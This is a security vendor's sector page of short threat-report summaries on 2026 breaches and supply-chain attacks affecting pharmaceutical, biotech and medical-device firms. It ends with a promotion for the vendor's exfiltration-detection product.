✨ The Containment Era is here. Secure AI workloads before they breach. →The Containment Era is here. →The Containment Era is here. →Explore ✨
Biotechnology/Greentech
Breach intelligence, attack campaigns, and threat reports targeting the Biotechnology/Greentech sector.
Explore Other Sectors
Biotechnology/Greentech Threat Reports
Novo Nordisk 2026 Breach: A Wake-Up Call for Software Development Security
In March 2026, Novo Nordisk, a leading pharmaceutical company, experienced a significant security breach initiated through an exposed GitHub personal access token found in client-side JavaScript on a subdomain. The threat group FulcrumSec exploited this token to clone private repositories, harvest additional credentials, and infiltrate deeper into the company's network. Over a span of more than two months, the attackers exfiltrated approximately 1.3TB of sensitive data, including source code, proprietary drug information, clinical trial data, internal AI models, and personal information of healthcare professionals and clinical trial participants. The breach was publicly disclosed on June 11, 2026, after unauthorized access to internal IT systems was detected. This incident highlights the critical vulnerabilities in software development pipelines, particularly concerning secrets management and the security of code repositories. The reliance on hardcoded credentials and improperly scoped access keys within development environments presents a substantial risk. Organizations are urged to treat development platforms as production systems, enforce stringent secrets management practices, and implement robust monitoring to prevent similar breaches.
6 days ago
Kill Chain
Novo Nordisk's 2026 Data Breach: A Wake-Up Call for Pharma Cybersecurity
In June 2026, Danish pharmaceutical company Novo Nordisk experienced a cybersecurity incident resulting in unauthorized access to certain internal IT systems. The breach led to the external copying of non-public data, including pseudonymized patient information from some clinical trials. This data encompassed patient IDs, trial participation details, sex, year of birth, biomarkers, health data, and lifestyle factors. Importantly, the data did not include direct identifiers such as patient names, mitigating the risk of immediate patient identification. The company promptly launched an investigation with external cybersecurity experts and notified relevant authorities. While certain internal systems were temporarily taken offline, Novo Nordisk confirmed that core business operations remained unaffected. This incident underscores the persistent threat of cyberattacks targeting sensitive health data within the pharmaceutical industry. Organizations handling such data must continually enhance their cybersecurity measures to protect against unauthorized access and data breaches. The event also highlights the importance of rapid response and transparent communication in maintaining trust and compliance in the face of security incidents.
1 week ago
Kill Chain
Shai-Hulud Attack Compromises 19 Science-Focused PyPI Packages
In June 2026, a sophisticated supply-chain attack known as 'Shai-Hulud' compromised 19 science-focused packages on the Python Package Index (PyPI), including popular bioinformatics tools like Dynamo, Spateo, CoolBox, U-FISH, and Napari-UFISH. The attackers injected malicious code into these packages, which, upon execution, attempted to download and run additional scripts designed to steal a wide array of developer credentials, such as GitHub tokens, cloud service credentials, and SSH keys. This breach underscores the vulnerability of open-source repositories to supply-chain attacks and highlights the critical need for enhanced security measures in software development workflows. The incident is part of a broader trend of increasing supply-chain attacks targeting open-source ecosystems, emphasizing the urgency for developers and organizations to implement robust security practices, including regular audits of dependencies and the use of automated tools to detect malicious code.
2 weeks ago
Kill Chain
California Attorney General Sues 23andMe Over 2023 Data Breach
In October 2023, genetic testing company 23andMe experienced a significant data breach affecting approximately 6.9 million users, including 855,541 Californians. Attackers exploited reused passwords through a credential-stuffing attack, initially compromising around 14,000 accounts. Due to the interconnected nature of 23andMe's 'DNA Relatives' feature, the breach expanded, exposing sensitive genetic and personal information such as ancestry reports, health predispositions, and DNA matches. The company faced multiple lawsuits and regulatory fines, ultimately filing for bankruptcy in March 2025. In May 2026, California Attorney General Rob Bonta filed a lawsuit against 23andMe, now known as Chrome Holding Co., alleging failure to implement reasonable safeguards against credential-stuffing attacks and misleading public statements regarding the breach. This incident underscores the critical importance of robust cybersecurity measures, especially in handling sensitive genetic data. The rise in credential-stuffing attacks highlights the need for organizations to enforce strong password policies and multi-factor authentication to protect user information.
3 weeks ago
Kill Chain
West Pharmaceutical Services Ransomware Attack Disrupts Global Operations
In May 2026, West Pharmaceutical Services, a leading manufacturer of pharmaceutical packaging and delivery systems, experienced a significant ransomware attack. Detected on May 4, the attack involved unauthorized data exfiltration and system encryption, leading the company to proactively shut down and isolate affected on-premise infrastructure globally. This containment measure temporarily disrupted business operations worldwide. The company engaged Palo Alto Networks' Unit 42 for incident response and notified law enforcement. As of May 11, core enterprise systems had been restored, and critical shipping, receiving, and manufacturing processes had restarted at some sites; however, a complete restoration timeline had not been finalized. The financial impact of the incident remains under assessment. This incident underscores the escalating threat of ransomware attacks targeting critical infrastructure sectors, including pharmaceutical manufacturing. Organizations in these sectors must prioritize robust cybersecurity measures, incident response planning, and employee training to mitigate the risk of such disruptive attacks.
1 month ago
Kill Chain
Medtronic Confirms 2026 Data Breach by ShinyHunters
In April 2026, Medtronic, the world's largest medical device company, confirmed a data breach involving unauthorized access to certain corporate IT systems. The cybercriminal group ShinyHunters claimed responsibility, alleging the theft of over 9 million records containing personally identifiable information (PII) and terabytes of internal corporate data. Medtronic stated that the breach did not impact their products, patient safety, or business operations, emphasizing that the affected corporate IT systems are separate from those supporting their products and manufacturing operations. The company is conducting an ongoing investigation to determine the full scope of the incident and any potential exposure of personal data. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/medtronic-confirms-breach-after-hackers-claim-9-million-records-theft/?utm_source=openai)) This incident underscores the escalating threat posed by cyber extortion groups like ShinyHunters, who have been increasingly targeting large organizations across various sectors. The breach highlights the critical importance of robust cybersecurity measures and the need for organizations to remain vigilant against sophisticated cyber threats that can compromise sensitive data and disrupt operations.
1 month ago
Kill Chain
Chinese Silk Typhoon Hacker Extradited to U.S. Over COVID Research Cyberattacks
In April 2026, Chinese national Xu Zewei was extradited from Italy to the United States to face charges related to cyberattacks conducted between February 2020 and June 2021. Xu, allegedly operating under the direction of China's Ministry of State Security, targeted U.S. universities and organizations to steal COVID-19 research data. He exploited vulnerabilities in Microsoft Exchange Server, compromising thousands of systems worldwide. Xu was arrested in Milan in July 2025 and now faces multiple charges, including wire fraud and aggravated identity theft. ([justice.gov](https://www.justice.gov/opa/pr/prolific-chinese-state-sponsored-contract-hacker-extradited-italy?utm_source=openai)) This incident underscores the persistent threat posed by state-sponsored cyber espionage, particularly in the context of global health crises. The extradition highlights international cooperation in combating cybercrime and the ongoing need for robust cybersecurity measures to protect sensitive research and infrastructure.
1 month ago
Kill Chain
Critical npm Supply Chain Attack Exposes Developer Credentials
In April 2026, a sophisticated supply chain attack targeted the Node Package Manager (npm) ecosystem, compromising multiple packages from Namastex Labs, a company specializing in AI-based solutions. The attackers injected malicious code into these packages, enabling the theft of developer credentials, API keys, SSH keys, and other sensitive data. The malware exhibited worm-like behavior by identifying npm publishing tokens on compromised systems and propagating itself by injecting malicious code into other packages that the stolen tokens could access, leading to a rapid spread across the npm ecosystem. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/new-npm-supply-chain-attack-self-spreads-to-steal-auth-tokens/?utm_source=openai)) This incident underscores the escalating threat of supply chain attacks within open-source ecosystems. The attackers' ability to compromise trusted packages and leverage them to distribute malware highlights the critical need for enhanced security measures in software development pipelines. Organizations must prioritize the implementation of robust security practices, including regular audits of dependencies, strict access controls, and continuous monitoring, to mitigate the risks associated with such attacks.
2 months ago
Kill Chain
GPUBreach 2026: Unveiling the Latest NVIDIA GPU Rowhammer Attack
In April 2026, researchers from the University of Toronto unveiled 'GPUBreach,' a sophisticated attack leveraging Rowhammer techniques on NVIDIA GPUs equipped with GDDR6 memory. This method enables unprivileged CUDA kernels to induce bit-flips in GPU page tables, granting arbitrary GPU memory access. Exploiting vulnerabilities in NVIDIA drivers, attackers can escalate privileges to achieve full system compromise, even with Input-Output Memory Management Unit (IOMMU) protections active. The attack was demonstrated on NVIDIA RTX A6000 GPUs, commonly used in AI development and training workloads. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/new-gpubreach-attack-enables-system-takeover-via-gpu-rowhammer/?utm_source=openai)) The emergence of GPUBreach underscores a significant evolution in hardware-based attacks, highlighting the necessity for robust hardware security measures. As adversaries increasingly exploit hardware vulnerabilities, organizations must prioritize comprehensive security strategies that encompass both software and hardware components to mitigate such advanced threats.
2 months ago
Kill Chain
Malicious npm Package Poses as OpenClaw Installer, Deploys RAT on macOS
In early March 2026, a malicious npm package named '@openclaw-ai/openclawai' was discovered posing as an installer for OpenClaw. Uploaded on March 3, 2026, by a user named 'openclaw-ai', the package was downloaded 178 times before detection. Upon installation, it executed a postinstall script that deployed a remote access trojan (RAT) capable of stealing sensitive data, including system credentials, browser data, cryptocurrency wallets, SSH keys, Apple Keychain databases, and iMessage history. The malware also established persistence, allowing continuous remote access and data exfiltration. This incident underscores the growing trend of supply chain attacks targeting open-source ecosystems, exploiting the trust developers place in widely-used package managers like npm. The sophistication of the attack, including social engineering tactics and advanced persistence mechanisms, highlights the urgent need for enhanced security measures in software development pipelines.
3 months ago
Kill Chain
UFP Technologies Cyberattack: A 2026 Data Theft Incident
In February 2026, UFP Technologies, a leading medical device manufacturer, detected unauthorized access to its IT systems. The breach, identified on February 14, led to the theft and potential destruction of company data, impacting critical functions such as billing and label creation for customer deliveries. Immediate containment measures were implemented, and external cybersecurity experts were engaged to investigate and remediate the incident. The company has since restored access to the affected information and believes the threat actor has been removed from its systems. This incident underscores the escalating cyber threats targeting the healthcare sector, emphasizing the need for robust cybersecurity measures. Organizations must remain vigilant against sophisticated attacks that can disrupt operations and compromise sensitive data, highlighting the importance of proactive defense strategies and incident response planning.
4 months ago
Kill Chain
Konni APT Leverages AI-Generated PowerShell to Breach Blockchain Developers
In January 2026, the North Korean-linked APT group Konni conducted a sophisticated phishing campaign targeting blockchain developers and engineering teams in Japan, Australia, and India. Using AI-generated PowerShell malware, attackers successfully penetrated targeted organizations by delivering malicious payloads through convincing spear-phishing emails. Once inside, the adversaries leveraged lateral movement and exfiltration techniques to access sensitive intellectual property and digital assets, expanding their historical targeting beyond South Korea and parts of Europe. The breach underscores the evolution of attacker tradecraft—adopting AI to evade traditional defenses and efficiently craft malicious code. This incident is highly relevant as it marks a notable surge in both AI-driven malware and the targeting of the blockchain sector. With threat actors broadening their geographic reach and operational sophistication, organizations must urgently re-evaluate their security controls, specifically around code execution, endpoint monitoring, and identity access management, to defend against emerging threats.
5 months ago
Kill Chain
Stop Active Cloud Data Exfiltration
Aviatrix Breach Lock helps teams instantly identify what data is leaving the environment, from which workload, and where it’s going — during an active breach.
Looking for threats in a different sector?
Browse All Threat Reports